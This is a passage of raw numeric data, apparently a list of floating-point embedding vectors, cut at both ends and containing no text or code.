009548641,0.024195973,-0.020998944,0.004155587,0.018563498,-0.010726432,-0.008917549,-0.00601535,-0.012379894,0.017898243,-0.0052256277,0.0012070559,0.008667219,0.00980343,0.0037067933,0.0011822605,0.033263836,-0.008396,-0.016864594,0.009999828,-0.009901465,-0.007908666,0.0350547,0.008851995,0.007939783,0.015728196,-0.0040403986,0.0018026897,-0.026955219,0.023259912,0.012660338,-0.0072186273,0.0065167444,0.023963729,-0.019185655,-0.0012990646,0.0031592664,-0.0016854351,0.0038329845,0.0034071603,0.003264813,0.0021303107,0.0071759275,-0.0057849362,-0.0039325827,0.025366547,0.022529934,0.020999175,0.0109720575,0.017328568,0.0090052355,0.015803644,-0.030419255,0.018238477,-0.023889601,-0.010493889,-0.01779886,0.0061910655,0.0016860779,-0.0022690934,-0.0024667585,0.008495856,-0.009597446,-0.005443939,-0.009234121,0.004845603,0.001458504,0.026765695,0.0036775798,0.008333347,0.0014564019,0.00651828,-0.030066354,-0.0053588133,-0.01487087,-0.026090913,-0.00073518,-0.008801764,-0.011801683,0.029335236,-0.00800929,0.00869881,-0.004200946,-0.018223533,-0.002700164,0.0042278725,-0.00427295,-0.010019576,0.014453866,0.00022206212,0.027012898,-0.0023110106,0.01570783,0.006052636,-0.0087885,-0.0013254812,0.011786637,-0.001412204,-0.013275611,-0.0032849668,0.014502745,0.0022708925,-0.0037324205,-0.0237047,-0.0136722755,0.0007167288,0.02091702,-0.01380144,-0.006451138,0.022819204,0.013367901,0.0028491295,-0.0130825,-0.0008450506,-0.0029135987,-0.02007558,-0.009352019,0.006878405,0.009792008,-0.008703766,-0.009599859,-0.0034647698,-0.016635485,-0.03850086,-0.0056599923,-0.011251335,0.013244493,0.0423333,-0.028347967,0.0018123775,-0.01219013,0.013601017,-0.006960731,0.027158476,-0.020677097,0.021096699,0.024382692,0.009600569,0.014975351,0.0059583755,0.002323354,-0.012833295,-0.001643775,0.00816532,0.008262104,-0.00013803216,0.0047457474,0.08271869,0.016121952,-0.007989701,0.005977899,0.002762115,0.02384141,0.017511193,0.005809544,0.0014925363,0.004347268,-0.0025482196,-0.000112814436,-0.00021888816,-0.007394245,0.012947811,0.020270916,-0.002969352,0.0042277924,0.010371058,-0.005239972,0.016284969,0.0015641735,-0.0049074953,0.01135518,0.0062270314,-0.03411616,-0.0050597372,0.018573422,-0.0034249774,0.010267986,0.031041764,0.013994711,0.0132635245,0.016206656,0.013613492,-0.005815177,0.009502443,-0.01706881,0.012378813,0.018587712,0.025493378,0.0068623717,-0.006037621,-0.013210008,-0.032126136,-0.00007250221,-0.0025309825,0.0031797672,-0.017287448,0.0025824038,0.004302297,0.016909465,-0.003283685,0.007808686,0.008219837,0.017520145,0.0011922707,-0.0028551796,0.0055483575,-0.01836571,0.028992783,-0.008614107,-0.0046925503,0.0113680465,0.02870172,0.006538431,-0.035508323,0.005838192,-0.026308032,-0.037799384,0.008854249,-0.012948881,0.016660683,0.010242917,-0.011494243,0.0077239275,-0.011310667,-0.007777623,0.008328079,-0.016619083,0.0047715567,0.004875461,-0.010991137,0.0037608685,0.02584314,-0.006067811,0.00026705622,0.01524982,0.02439633,0.000917704,0.0016896427,0.029548086,0.010154409,-0.019857882,-0.011816001,0.015698059,0.022410361,-0.007827249,-0.0032990526,-0.007960219,0.02012946,0.0022800495,-0.00087244296,0.0052603753,-0.0074916515,0.018356465,0.003711323,0.0022822262,-0.00445538,0.0011196455,0.0071708974,-0.006572449,0.007142674,-0.009736081,0.0058257105,-0.013031221,-0.022869205,-0.028471902,-0.008316231,-0.021580968,-0.011420199,0.022168765,0.023400456,0.012697768,-0.00032689213,0.014014965,-0.01485563,0.0061413585,-0.0150289405,-0.0067453003,0.009496863,-0.018267518,-0.012172463,0.010491616,0.0017383303,-0.0021600528,0.012132222,0.009224239,0.011745633,0.0050479174,0.023270981,0.009943797,-0.004578652,0.009375637,0.016390683,-0.017996473,0.015488328,-0.0033180546,0.022555128,0.017890092,0.0014028818,0.0115255015,0.013047183,0.010318329,-0.002545054,-0.04257962,-0.008839667,-0.015593207,-0.017927913,-0.00029977717,0.013086801,-0.0014257996,0.026492808,-0.034181233,0.009090717,0.0073998505,0.0015999477,0.01564484,0.009996696,0.01769511,-0.020272542,-0.0042490056,-0.020811858,-0.007514178,-0.011488414,-0.025987064,0.003970681,-0.0049478286,-0.010134117,0.010261592,0.010104712,0.026275594,-0.0037167275,0.015129931,0.003704844,-0.012932896,0.00878611,0.0008198247,0.0028096063,0.02882413,-0.0070910035,0.010978226,0.004188512,0.025352027,-0.00643041,0.0010705729,-0.0321657,0.031789836,-0.010613279,-0.04194542,-0.010098891,-0.009765108,-0.008303469,0.013720741,0.02037928,-0.015608172,-0.011217985,-0.015305738,-0.0026315681,0.00073809054,-0.0038835627,0.0083189355,-0.0143472385,-0.019317733,-0.021906331,0.022323448,-0.024489846,-0.0045390734,-0.045300204,0.012734022,0.0031143967,-0.024420965,-0.033532687,0.014155956,-0.000112681344,-0.0077616177,0.0075276294,0.018426498,0.0103184,-0.010006259,0.0014936492,-0.004290876,-0.011246384,0.0023168859,-0.0013636568,-0.0054363795,-0.00042789328,0.0009332419,0.0066763577,-0.001017402,0.0072383056,-0.008003556,0.013186163,0.0060803806,-0.027808124,-0.013432553,0.006571296,-0.0012049212,-0.015937705,-0.015956676,-0.0133655565,0.0070846407,-0.029979259,-0.0060761855,-0.02230456,0.0054421797,-0.0016580537,0.00000984338,-0.00017020322,-0.0117988195,0.015088387,0.0068458235,0.0010579462,0.01756148,0.0030577765,-0.0129585555,-0.0075964932,0.014993464,0.014592953,-0.021183247,-0.01698023,0.0013658833,-0.015411689,-0.010421191,-0.024408305,0.0005371288,-0.010948953,-0.0021963718,0.00012210483,0.01264785,-0.0073087458,-0.029366892,0.023667641,-0.035561647,-0.0014117026,0.0075676586,0.009354114,-0.007982541,0.023214709,-0.056310944,0.008620988,0.0086290045,-0.026059527,0.0028296013,0.008455542,-0.014624236,-0.09015935,-0.010533844,0.016181832,-0.031269133,-0.013163386,-0.026250815,0.010710301,-0.00055558485,-0.020069899,-0.00053499854,-0.0039826534,-0.010396501,-0.0002825441,0.03605643,0.0020996295,-0.0056491876,0.01408482,-0.019335274,0.021697117,-0.005649614,0.007616332,-0.0034820233,-0.0073653897,-0.0130025055,0.008914647,-0.018813988,0.013913185,-0.005390823,-0.0030610934,-0.0024333182,0.021549825,-0.025802338,-0.011341381,-0.045285065,-0.005315506,-0.011569321,0.032540176,0.0036616207,0.003440358,0.012396204,0.0035532073,0.12963034,-0.008446393,-0.00018496499,-0.038819533,0.012811311,-0.010392157,-0.0036211787,0.015701702,-0.00937634,0.002652812,-0.010859613,0.0042564324,0.006798283,-0.008190137,-0.00034853068,-0.0056290305,0.003196005,0.10731677,0.018121997,0.0073986277,0.02273416,-0.019114656,0.02554451,0.011199422,-0.014260696,-0.072373785,0.0007239363,-0.01678256,0.021930069,0.0015542619,0.01371306,0.008192955,0.0046128407,0.003927179,-0.0043364223,0.025982343,-0.03161287,-0.0031089156,-0.023504835,-0.0054427832,0.006438705,-0.0042216936,0.009169992,0.0025069488,-0.01633359,0.006858174,-0.015496599,-0.0019193728,0.01373619,0.02710408,0.007562424,0.0035011398,0.014165094,0.00053974485,-0.0108515415,0.009405486,0.0018503091,0.018337568,-0.02511808,0.000030967727,0.023612916,0.005009567,0.00035122246,0.016315974,0.0032759672,0.0028864485,-0.0145606445,-0.02946649,-0.021976987,0.008596787,-0.018129997,-0.029373383,-0.00062523165,-0.005240054,-0.0060228063,0.011121146,-0.014884865,-0.005478564,0.007146949,-0.018668076,0.006604921,0.012951538,-0.01665944,0.014771474,-0.0002051777,0.035773337,-0.015737837,-0.024736233,0.0071943845,0.008681354,-0.020290134,0.00641492,0.0039840993,-0.0149475755,0.007870561,0.028400086,-0.005027493,-0.009792701,-0.021534303,-0.015065757,0.0001910172,0.0020619757,-0.009943692,0.010370509,0.012202703,-0.005368149,-0.003421405,-0.0027608261,0.014146693,0.0041895728,-0.0048642643,0.016278677,0.02532287,-0.004933036,0.0019311116,-0.010584953,0.019108227,0.026778251,-0.03014708,0.019665385,-0.002327566,-0.0037644543,0.018313164,-0.008842161,-0.0067821615,-0.0080191195,-0.0061073047,-0.021463327,-0.01539694,-0.014599993,-0.020783497,-0.022670958,-0.007324001,0.014662612,0.010390774,-0.0032214562,0.003712148,-0.030970188,0.0011337543,0.015319823,-0.010114764,0.015031466,-0.008956452,0.02746518,-0.0050777677,-0.009887667,0.028571242,-0.020640522],[0.0055256383,0.015493234,0.003334785,-0.0057796054,-0.011264695,-0.017039804,-0.026304089,0.014259889,0.0003394332,0.00091054436,0.02225011,0.028197892,-0.007802479,-0.00101812,-0.019258192,-0.0065874173,0.01256407,-0.0018434671,0.033599027,-0.0018140719,0.009609631,-0.0061483984,-0.0050925827,-0.0027572694,0.010266117,0.022337627,-0.013892438,0.0031406614,0.0063842456,-0.01507552,0.020140948,0.02190254,-0.005316455,-0.004755889,0.030462954,0.0076767043,-0.0032772885,-0.025707722,0.013955311,-0.007847866,0.021954255,0.01583543,-0.018378593,0.015054769,-0.0020348448,-0.02038383,-0.028773801,-0.024381371,-0.030251706,0.011008246,0.002929722,0.010054506,0.0014145323,-0.01841873,-0.01669955,0.027895017,-0.010329698,-0.0204595,0.023218034,0.013032882,-0.01610098,0.02999182,-0.0090414155,0.009854465,0.043836992,-0.0015606015,0.008426063,0.00224502,-0.026470693,-0.0018293881,0.02174572,-0.015517156,-0.00810175,-0.0060682506,-0.0135214655,0.023454716,0.0051453565,-0.010077525,-0.006493522,-0.01995228,-0.016300302,-0.017437777,0.007191605,-0.017235769,-0.004924657,-0.03091335,0.004695794,-0.0036832988,-0.008361979,-0.0028580637,-0.01707065,0.008522185,-0.012044672,0.009718689,-0.027030393,0.023671918,0.030750357,-0.02214585,0.00905906,0.0006825471,-0.013541052,-0.006197791,-0.011136091,0.0010145006,-0.007060385,0.00017997356,-0.0072559156,0.0043519842,0.010122626,-0.008569533,0.00003276847,0.020183085,0.018583082,0.009375989,-0.005345455,-0.021909902,0.0034092395,0.010499153,0.0034130965,-0.006136036,-0.0023553339,-0.0032121788,0.018547669,0.005990317,0.0071512237,-0.020827323,0.02051372,0.015170871,-0.01108074,0.016938375,-0.009276445,0.025197363,-0.0142656695,-0.0018910518,0.004494773,-0.0097151,-0.0046060747,0.015388534,0.01112559,-0.016626848,0.028106418,0.005667661,0.025449928,0.028751628,0.0099615855,-0.0030973821,-0.001942703,0.0033541715,0.019088166,0.009312205,0.009554741,0.015893137,0.010329719,0.00205033,0.01054767,0.0044278284,-0.019039102,-0.013430758,-0.006968236,-0.00075580395,0.011938364,-0.00022297261,-0.0034572224,0.03515074,-0.011559082,-0.0039725765,-0.0076751774,-0.0026569439,0.0072305966,0.00900157,0.0071016317,0.008461006,-0.002507157,-0.0013923219,-0.00071061734,-0.02074456,0.009266141,-0.027079616,-0.023898412,-0.008610603,-0.0028780377,0.026717748,0.012355174,-0.020144155,0.0008415325,0.025904361,0.006902553,0.034253202,-0.008767341,0.016516907,-0.01665192,-0.013852394,0.0074441,0.015857928,-0.038865168,0.015659064,-0.012556887,0.13564117,0.008373825,-0.011600121,-0.022038912,-0.0029288975,0.003800509,-0.042734202,-0.0027329768,-0.015448494,-0.011362397,0.008041921,0.0073990487,-0.017371865,-0.00063555787,0.00031449113,-0.008625245,0.008171354,0.011057208,-0.077800855,0.01436702,0.0318215,-0.009987216,0.022762138,0.004631051,-0.008053088,-0.020089878,0.0022236917,0.00033104865,0.01893559,0.018583473,0.005963159,-0.00006351682,-0.024189712,0.005009259,0.011825674,-0.037631113,0.0044261008,0.018528234,-0.035913065,0.018697942,0.008980672,0.009029812,-0.0058587985,-0.013753698,-0.00012331964,0.024666425,-0.012936579,-0.016504725,0.011753042,0.037035145,0.010455722,-0.005701982,-0.01253322,-0.0014244466,-0.022347478,0.0055720042,0.016884832,0.006400811,-0.015964737,-0.005588076,0.0029465698,-0.010601813,0.00258652,-0.00056832307,0.01988331,-0.017481755,-0.0107045295,0.014436967,0.016321417,-0.0032984558,-0.050944936,-0.024266686,0.0033514192,-0.041598253,0.013175902,-0.01226062,-0.011331055,0.013978343,0.014342157,0.021594178,0.011313884,0.021683162,-0.0010566695,-0.008631913,0.006338191,0.0055129267,-0.0083233705,-0.03655373,-0.01784671,0.010593929,-0.0084187165,0.029446203,-0.021350382,-0.016247114,0.0077810837,0.01338853,0.0021669127,0.0034469645,-0.0140169915,-0.03415786,0.015699523,0.013409692,-0.008629216,-0.008605095,-0.029677758,0.022234485,-0.006250788,0.0022585285,0.012964431,-0.015102958,0.030736763,0.0006589118,0.0031994805,-0.0006353108,-0.008204124,-0.006570176,0.01774262,0.007725579,0.0013882904,0.005706439,0.0002803813,0.008299408,0.0048574847,0.01360459,0.0050739166,0.0053469497,0.010531992,0.0046200557,-0.015015325,0.016045526,0.0030969125,0.00077416806,0.002590703,0.027797043,-0.011492118,0.01465861,0.014233135,-0.019165706,0.015737087,0.0063201976,0.011427176,-0.014477958,0.03156972,0.0028406673,-0.001378063,-0.011790388,-0.0064471094,-0.010532215,0.017975438,-0.0044358354,-0.006232514,0.0035535118,-0.016244937,0.011583269,-0.011051301,-0.029889133,-0.01851134,-0.010263091,0.010968848,-0.02261116,-0.019212143,0.011728688,-0.018017799,0.021750573,0.010255737,0.029939163,0.0047412966,0.10450236,-0.0046768566,0.003397213,0.009242888,-0.005381277,-0.028936354,0.017213263,-0.0035275465,-0.014886949,0.0060508177,0.0026075558,-0.02048057,-0.013751262,0.011437747,-0.0059206677,-0.0016788163,-0.022706402,0.010678644,-0.021365592,-0.027437488,0.012959946,-0.0074745235,-0.04438171,0.019830916,0.028941333,0.005906573,-0.0068403115,-0.018326955,0.0074240123,-0.020074895,-0.010678218,-0.036331985,-0.029009763,-0.007959984,-0.01594823,0.0013315853,0.0026558167,-0.0017583874,-0.016995136,-0.0021275016,-0.028726453,-0.017653072,-0.016354708,-0.008905842,-0.016258614,0.006476853,0.011175405,0.0039674933,-0.00023985803,-0.0023648287,0.013174212,0.021061096,-0.016582023,0.025778404,-0.01090234,0.008375738,0.010862117,-0.015647804,0.0051153875,0.007944672,0.0056302883,0.010157044,-0.03318747,0.0071198954,-0.006281076,0.04622543,0.004498585,-0.010148382,-0.005604742,-0.0031268848,-0.0067448076,0.007475408,0.025584647,0.004917859,-0.013539681,-0.007537611,-0.0066752224,-0.00928554,-0.024422333,0.0046633678,0.005096519,0.020829149,-0.012478062,-0.0065444694,-0.027432023,0.024916213,-0.00810877,0.013356413,0.0044631585,-0.0062635615,0.014642766,0.016623938,0.022247221,-0.012182963,-0.006799217,-0.020209838,0.033561494,-0.018403165,-0.009164022,0.019414693,-0.0123909945,0.0035796019,-0.00041697864,0.01533327,-0.0034808523,0.0008333927,0.017011266,-0.013940807,0.0077706645,0.008940767,0.00541371,0.006215731,0.011931965,-0.00069166534,0.0058605126,-0.009319646,-0.006511986,-0.0028159635,-0.0041618478,0.01054468,0.010185179,0.025303757,0.016655603,0.008063071,-0.021260215,0.032513015,-0.0049817204,0.01900822,0.0040284847,0.037671167,0.016210275,-0.010188584,-0.0045257336,-0.02708548,-0.015838068,-0.011272205,0.013098533,-0.025433809,0.0227903,0.021218682,0.013906989,-0.006824802,0.010771738,0.0075728195,0.0038275572,0.007851665,0.016795425,-0.0075651444,0.02198861,-0.007545996,-0.0028649955,-0.006650082,-0.0006511814,-0.026031723,-0.014552545,0.012186259,0.01882855,-0.016544262,0.00026169102,-0.017345188,0.045840085,-0.024378458,0.024016686,-0.016087113,-0.01791143,0.00011025739,0.0011671518,0.08687888,-0.004803595,-0.0075389054,0.0069516734,-0.0023480363,0.013151153,0.014464519,0.006857144,-0.024894642,0.0065137176,0.0076042577,-0.020440826,0.0041056215,0.016268559,-0.022963567,-0.0056350986,0.01039522,0.00007927693,0.0054201195,0.009990628,-0.017334627,-0.0005894399,-0.016497215,-0.03090287,-0.019694092,0.004449174,0.03549145,0.0126014,0.009783685,0.00091493083,-0.010211482,0.0036365387,-0.009954311,-0.0045873336,0.016108917,0.01903408,-0.005247693,-0.011445028,-0.013964547,0.017164102,0.025194472,-0.012424156,0.005280508,0.0026320338,0.012787095,-0.01744718,-0.032927956,-0.00069926615,-0.008081548,-0.032700285,0.007825498,0.011626694,0.012520385,-0.0063868226,-0.0047938987,-0.008515103,0.02734258,0.013830342,0.0023307418,-0.000021193036,-0.005551618,-0.0018748712,-0.025590759,-0.011443099,0.019013036,0.015352279,0.009925749,-0.005147313,0.008235849,-0.016128609,-0.009952337,0.016403556,0.0038419005,0.00085528777,0.016160918,0.011190697,0.012468733,-0.008111522,0.02893683,-0.01236141,0.000591268,0.02799166,-0.0019311511,-0.009012979,0.02565909,0.026472088,-0.0084016835,0.014479465,-0.00875874,-0.02321976,0.014339568,0.021713393,0.015486592,-0.003737517,-0.009012978,0.025491163,0.013217386,0.010769973,-0.0021080906,0.010433384,-0.011718876,-0.033116654,-0.0343897,0.023149798,-0.00886795,-0.018536294,-0.014321466,-0.012231033,0.029968353,-0.016572583,-0.007554169,-0.06524317,0.023193216,0.019382764,0.03138571,-0.017940743,0.05109063,-0.02780197,0.019100279,0.0055554,-0.0097397175,-0.0059917215,0.0009923581,-0.011747734,0.0086781485,0.007803644,0.008026057,-0.013446277,-0.022061475,-0.008540267,-0.07765236,0.020659406,0.01800453,0.013789951,-0.013913496,-0.019014293,0.011389624,-0.011269276,-0.00900669,-0.014163462,-0.014216931,0.00097580306,0.021988256,-0.0063381265,0.00604726,-0.031515803,-0.00093294814,0.00017007686,0.032208785,-0.012448916,-0.0043356256,0.00046626502,-0.011900205,-0.011987793,0.007485301,-0.023332264,-0.0050184345,-0.028080458,0.025798041,-0.010342797,0.021254221,-0.01498353,-0.014115113,0.0004701301,0.010066208,-0.0003733107,0.002255846,-0.010057327,0.031996693,-0.00034845198,0.011192381,0.0046749795,0.02265952,-0.0074790074,0.002538091,0.0020699038,0.0039079497,0.011837264,0.00027924392,-0.016477237,0.012261515,-0.013969961,0.014174991,0.049494293,0.008263979,-0.0011893997,0.004988345,0.01061904,-0.0047975807,0.009473321,-0.018553624,0.0014561273,-0.03671934,-0.029764375,-0.0035467763,-0.000010153253,-0.009366982,-0.008187597,0.0012670844,0.00759901,-0.011491385,0.008750726,-0.013546301,-0.022850022,0.0030873816,0.016854288,-0.005784212,-0.019777525,-0.024514811,-0.01716511,0.015089488,0.03225835,-0.0084546795,-0.03363174,-0.011400929,-0.011997737,-0.0036872528,-0.033441953,-0.0054786317,-0.007111694,0.020038234,0.016685346,0.023326745,-0.0070489775,-0.0022652105,0.017872185,0.023363924,-0.008053638,0.0195751,0.0033542383,-0.026311945,0.00027379114,0.016651647,-0.017720472,-0.022780668,0.008162955,-0.0076183304,-0.009270352,-0.029364161,-0.01105713,0.029202629,0.026131364,0.005841558,-0.04364366,-0.0029439277,-0.00835495,0.006705447,0.015540551,-0.015635597,-0.009469233,0.003947385,0.003908206,-0.013707648,-0.016710406,-0.0039920043,0.03409613,0.000086078406,-0.011289913,0.011392691,0.0075893807,-0.0013005328,0.0188961,0.011177724,-0.009040483,0.000995303,-0.022728628,0.02475545,-0.009417458,-0.018438708,-0.011890746,-0.0037894193,-0.0056622317,0.0042775413,-0.0055544428,-0.013655306,0.016355861,0.01350002,-0.024679435,0.010071788,0.001961379,0.014128648,-0.014711133,0.010474076,-0.018986844,-0.008429886,-0.026376152,-0.0029110115,-0.028925622,0.022774905,-0.027059948,-0.023150409,-0.012845925,-0.020662338,-0.025464635,-0.012458841,-0.019742575,-0.0010122965,0.010720143,0.00089643267,0.017020563,-0.00968712,0.00007554933,0.011973916,0.024132749,-0.034131672,0.0068631736,0.0019972513,0.00017925055,0.026141608,0.010627115,-0.010018698,0.040109105,0.008430668,-0.010965656,0.021499703,0.014590267,-0.0074384827,0.004936226,0.001888424,-0.019112635,-0.010988431,0.020851996,-0.00043874967,0.0101877935,-0.0029996147,0.003462163,0.02444181,0.026028892,-0.013084976,-0.010301908,0.005925974,0.010492637,-0.0026423386,0.0067702113,0.0028909764,0.016119603,-0.018765062,-0.011057317,0.016598593,0.00007747463,0.005620994,-0.00063334324,0.0075601772,-0.00389861,0.012872032,0.004786842,0.00022827767,-0.026714452,-0.0026531473,0.008185429,0.016420126,0.01153771,0.011645472,0.00074152654,0.010395651,0.019407976,0.0040240465,0.0065753767,-0.011008312,-0.02852616,-0.019231303,0.012668541,-0.034161016,-0.006445609,0.015283596,0.0032291033,-0.010452229,-0.016098294,-0.009063738,0.02087631,-0.024064085,0.005461863,0.011523746,0.008411081,0.01196341,0.018020377,0.004120271,-0.003359476,-0.0052063894,-0.009209831,0.03005748,-0.0048114574,0.024454737,-0.011543441,0.033395812,-0.025214931,-0.00014934165,-0.013083832,-0.0184479,0.01452829,-0.010220538,0.002020064,-0.0016111595,0.027361518,-0.014914942,0.022965126,-0.013327099,-0.018131254,0.019583184,-0.006449178,-0.011941693,-0.01077627,0.010378368,-0.0011732862,-0.028618159,0.005449057,0.0023738178,-0.062562205,0.021898685,0.009365381,-0.0006002047,-0.0026827103,0.021851528,-0.0025093318,0.012427773,0.023293301,-0.017053414,0.007664275,-0.0048886826,-0.023404041,-0.006087685,-0.028226558,-0.016215473,-0.02752546,0.01940992,0.018504538,0.021693312,-0.0059130457,0.008870862,-0.0056888303,-0.01852351,-0.018437488,-0.01382633,0.0010155557,0.011194199,-0.0043558963,0.02603938,0.028164595,0.01604285,0.0020841386,0.007993264,0.012827253,-0.01835647,0.015140493,0.0006146866,-0.0143376775,0.0021315652,0.003496416,-0.022152115,-0.001920386,0.021055391,-0.006637952,-0.00573476,-0.00031896404,-0.0232214,-0.019918881,-0.0075734304,0.02457251,-0.019536372,-0.008510096,0.024377245,-0.0057153413,0.013071227,-0.010440005,0.012861933,-0.012708467,0.0031486284,-0.0019629528,-0.0036970915,0.0034579479,0.039845433,-0.014302056,-0.010738092,0.006544286,-0.014676521,0.017575983,-0.008448959,0.0004100041,-0.008157181,-0.00793929,0.015940418,0.0010036716,0.023974342,0.012542285,-0.018748283,-0.008348853,-0.0012666961,0.0062627424,0.000128336,-0.0010650506,-0.008476217,-0.023185624,0.0013688678,0.012822558,0.022791702,-0.003043997,-0.013663903,0.023806272,-0.010076201,0.0042158067,0.020137267,0.0018136691,0.026945027,0.0053482647,0.0061532366,-0.007176379,0.006984503,0.01243805,-0.011303881,-0.013745222,0.018525347,-0.0042727836,0.0004891875,-0.011502486,-0.01733573,0.007113919,0.022622135,0.0111764865,-0.02912292,-0.017444395,0.02215322,-0.0015878265,-0.02130844,-0.00974049,0.031882998,0.037789218,0.0005284751,0.0037981272,-0.023500575,0.018221017,0.010462235,-0.010449954,-0.017057352,0.006458548,-0.0043505854,-0.0036899925,-0.0017806074,0.000022997865,-0.00972268,-0.027334223,0.00609068,-0.00118048,-0.011577553,0.004603551,-0.016311219,0.002911382,0.020402538,-0.018229963,-0.018457053,-0.03260175,0.008678347,-0.012198724,0.01126889,0.013342345,-0.014999111,0.0024431315,0.00423073,0.014530265,-0.013018734,-0.004779485,-0.023364173,-0.031755336,0.030789388,0.022853296,-0.005967833,-0.003711685,0.020934248,0.0023673247,-0.007298495,0.005250097,-0.0126013,-0.031402536,-0.01574962,0.00003515336,-0.0066515864,0.008749725,0.014361413,0.010655989,-0.0031068353,0.0002779708,0.010411882,0.014080293,-0.0010346427,0.011509295,0.007468515,-0.008423008,0.0009125421,-0.004085291,0.02106805,0.014743099,0.02406496,0.022879452,-0.0119543355,0.008236786,0.011648405,-0.033739675,-0.02744745,-0.0032870811,0.015772011,0.0038405363,0.009827914,-0.009152424,0.0019384989,-0.0029128033,0.010246915,-0.010850248,0.017300205,-0.0369457,0.027335176,0.0110178795,-0.017949048,-0.009793773,-0.005248762,0.015655251,-0.011005255,0.006558829,-0.007868344,0.0100491475,0.0016957489,-0.031404357,0.015843907,-0.021280812,-0.007202938,-0.020843722,-0.00088278245,0.011850435,-0.02172989,0.026037734,0.008840447,-0.0081032235,-0.021473836,-0.03062804,0.001316836,0.027639553,-0.016845807,-0.015945444,0.010688605,0.02695125,-0.032044858,0.016981497,0.004291235,-0.020599429,0.00944041,-0.018867122,-0.028383493,-0.018424556,-0.024347464,0.015470387,0.008699761,0.014088762,0.015496305,0.014973748,0.026684007,0.009230904,-0.004376858,0.013548421,0.00040220772,-0.0026428893,-0.012985407,0.016224623,-0.012792611,-0.029687786,-0.010070085,-0.007885336,-0.0054628965,0.009374985,-0.012795824,-0.00093319075,-0.00601127,0.004679248,-0.0058641615,0.036339868,-0.009945755,0.018113775,0.0053490326,-0.017956898,-0.009027004,0.0053448565,0.0054499265,0.0013193903,-0.0044288603,-0.018939435,-0.008351503,-0.028891373,-0.0055645746,0.006372392,-0.0042187697,0.01817706,0.0005042484,0.0020470845,-0.020575285,0.020466544,0.015688179,-0.01840396,-0.035592742,0.021791019,-0.0023756698,0.00039391726,-0.0014484581,0.010202334,0.020889789,0.0107493065,-0.03308904,0.011803764,0.0005838485,0.0064528543,-0.03189622,-0.009167425,-0.020018974,-0.009087335,-0.004857541,-0.009020832,-0.0103847645,0.005386086,0.0034793366,-0.0062571713,-0.012953357,-0.008880224,-0.012445503,-0.0017165047,-0.01185864,0.020054612,0.0012661188,-0.011032876,-0.0011483079,-0.01031094,-0.0007608005,-0.0027571092,-0.00036597613,-0.009612705,0.0036033066,-0.015013,0.011919679,0.0011438158,0.023489695,-0.054027367,-0.020176966,-0.011274774,-0.011362102,-0.033254262,0.0048568584,-0.015445909,0.018126313,0.0030788935,-0.016425313,0.015213205,0.0004701045,0.007061392,-0.020716626,0.06692815,-0.00030626063,0.0046268054,-0.018442778,-0.01172039,0.012511473,0.03663205,-0.021418627,0.02276822,0.017055456,-0.006118598,0.0073277433,0.012046039,0.016380744,0.01906168,0.006740822,0.011341771,-0.0020494936,0.013469504,0.0049434854,-0.015608934,0.009796775,-0.013706665,0.004411203,0.013798726,-0.016607318,0.018354807,-0.0131024,-0.014535873,0.00030441096,-0.003006338,-0.023062408,0.010654629,0.011926945,0.026015477,-0.021491058,0.005596241,0.0066205054,-0.00009664477,-0.028584981,0.0049535986,-0.013595784,0.020284856,-0.028994625,0.0036047585,0.0035171004,0.09009243,0.034332335,0.030328277,-0.02418554,0.005876019,0.028792653,-0.01641153,0.009403074,0.009119444,-0.015879238,0.021076892,0.018414706,-0.00956014,0.013584453,-0.0032077564,0.0046976,-0.0060808132,0.006591282,0.012503169,-0.016941844,-0.011950091,0.007084833,-0.0036667278,-0.019838963,0.0014129141,0.030153312,-0.028761294,-0.008476593,0.0012306425,0.0018018896,-0.014492715,-0.0056364415,0.021498848,0.028783707,0.007030565,-0.03976392,0.013253997,0.1784701,-0.007110732,0.024640517,0.026083874,-0.010967458,0.004836259,-0.08754683,0.005031286,-0.0064338506,0.01730668,-0.02136777,-0.027866036,-0.003972306,0.007450968,0.017759018,0.04007904,0.0084727835,-0.034527663,0.009639705,-0.008107586,0.008521936,-0.0026703468,-0.0032406056,0.0007559056,-0.014409947,-0.000035586658,0.03096296,-0.009414101,-0.023758939,0.012701965,-0.00007443911,0.015232046,0.0052347,0.0027287328,-0.04935909,0.025208075,0.010987945,0.009261565,-0.0143534355,-0.007433733,-0.001684263,0.023202997,-0.007234469,-0.04206666,-0.13052899,0.011367863,0.03053307,-0.017608214,-0.006330687,0.013611104,0.013720086,-0.0072327117,0.013839742,-0.013739511,0.000257506,0.0014821766,0.008047541,0.014745641,0.0048158118,-0.004914462,0.0025759526,0.010954565,0.0123805,0.020856347,0.009008178,0.010623122,-0.01620784,-0.02467713,0.01565024,0.0041507157,-0.023654977,-0.0070169475,-0.013380579,0.02296883,-0.016074128,-0.01313706,0.006448946,-0.0035134545,-0.0064864694,-0.019645544,-0.00028581033,0.019027887,-0.015547409,0.0063259387,-0.009981988,-0.0047889077,-0.014000669,0.00052448607,-0.0006688152,0.019534366,0.0076800142,-0.007921738,-0.010473959,0.016165191,0.026311053,0.0073586004,-0.038667202,-0.009094367,0.022318125,-0.023534711,-0.028838776,0.0006124889,-0.01659798,-0.006057093,-0.009914855,-0.010327747,-0.01328185,-0.0295304,0.008348809,-0.025586428,-0.0034843392,-0.02588942,-0.009570349,-0.0033599157,-0.0007743747,0.013240494,0.0329869,-0.0012343613,0.018697452,0.0131315375,-0.006196021,-0.0007456302,0.025116961,0.0068790764,-0.045686778,-0.0032656898,0.010605848,-0.022383457,0.0026935283,-0.011747535,0.0034209294,-0.014624739,0.009634382,0.005080026,0.012672079,0.0007206443,0.030207817,0.0024596069,-0.0072700563,0.00025894132,0.020033788,0.011969051,-0.021460423,0.026935184,0.015420593,-0.0231345,-0.010991368,0.035612825,-0.013743889,0.0038586261,-0.00015240804,-0.0077906973,-0.011227574,-0.01052447,-0.005266653,0.0057656514,0.0015346118,-0.013267618,-0.01855407,-0.01414853,0.024829693,0.00629332,0.003456563,0.011103193,-0.046103895,-0.022906112,-0.020497978,0.0007573778,0.021103041,0.0032725509,-0.031703573,-0.009616626,-0.010649915,-0.0042233113,-0.005225643,0.025759064,-0.0006193172,0.011793211,-0.016176667,0.0007924972,-0.004575134,-0.011252998,-0.010205243,-0.015265684,0.010633442,-0.018443791,-0.0171669,-0.0068690223,0.009038916,-0.0021186143,0.042177316,-0.008365564,0.030042997,-0.012683866,-0.0070805512,0.023735184,0.0073097073,-0.044467054,0.0030035248,0.09898087,-0.011249234,-0.013988953,0.007181982,-0.021374617,0.01292954,0.023240466,-0.018296208,-0.029693015,-0.02190902,-0.02235672,-0.0046549356,-0.009161796,0.007744103,-0.029380519,0.036789678,0.0059821936,0.007992173,-0.015232186,-0.004294592,-0.0032348149,0.0023918813,0.